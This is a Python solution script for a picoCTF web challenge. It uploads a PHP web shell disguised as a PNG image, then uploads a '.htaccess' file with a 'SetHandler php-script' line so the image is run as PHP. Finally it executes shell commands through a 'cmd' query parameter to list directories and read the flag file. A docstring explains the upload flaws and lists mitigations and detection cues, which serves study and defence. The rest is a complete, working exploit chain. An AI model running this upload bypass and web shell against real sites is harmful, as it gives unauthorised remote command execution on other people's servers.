
#!/usr/bin/env nix-shell
#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ requests ])"
import requests
# Root URL of the challenge web application that every request below is sent to.
# NOTE(review): plain HTTP; host and port presumably identify one launched
# picoCTF instance and will differ per session - confirm before reuse.
BASE_URL = "http://amiable-citadel.picoctf.net:53954"
def main():
    """Send the challenge's two uploads and two follow-up GETs, printing each response.

    The request sequence only works if the target has the following
    weaknesses (presumed from the requests made here; the server code is
    not shown), which are the points to check when reviewing any upload
    feature:

    * the upload handler stores a file whose body is PHP although it is
      named ``.png`` and declared as ``image/png``, i.e. neither content
      nor declared type is verified;
    * it stores a client-chosen ``.htaccess`` file name in the same
      directory;
    * that directory is web-served with per-directory overrides honoured,
      so the uploaded ``SetHandler`` line changes how the ``.png`` is
      handled.

    Mitigations: generate stored file names server-side and reject
    dotfiles, validate the decoded content rather than the extension or
    MIME header, keep uploads outside the document root, and configure the
    upload directory with ``AllowOverride None`` and no script handlers.
    For detection, look for uploads named ``.htaccess`` and for requests to
    image paths that carry a ``cmd`` query parameter.
    """
    upload_endpoint = BASE_URL + "/upload.php"
    divider = '-------------------------------'

    def show(response):
        # Status line first, then the body, exactly as the server returned it.
        print(response)
        print(response.text)

    def upload(filename, body, content_type):
        # Both parts go through ``files=`` so the multipart layout is the
        # same for every upload: the file part first, then the submit part.
        return requests.post(
            upload_endpoint,
            files={
                'image': (filename, body, content_type),
                'submit': 'Upload ID',
            },
        )

    # PHP body carried under an image name and image MIME type.
    php_body = b'''
<?php
system($_GET['cmd'] . ' 2>&1');
?>
'''
    show(upload('exploit.png', php_body, 'image/png'))
    print(divider)

    # Per-directory override placed next to the uploaded file.
    show(upload('.htaccess', b'SetHandler php-script', 'text/plain'))
    print(divider)

    # First a directory listing two levels up, then the flag file itself.
    commands = ("ls -lah ../..", "cat ../../flag.txt")
    for position, command in enumerate(commands):
        if position:
            print(divider)
        show(requests.get(BASE_URL + f"/images/exploit.png?cmd={command}"))
# Run the request sequence only when executed as a script, not on import.
if __name__ == "__main__":
    main()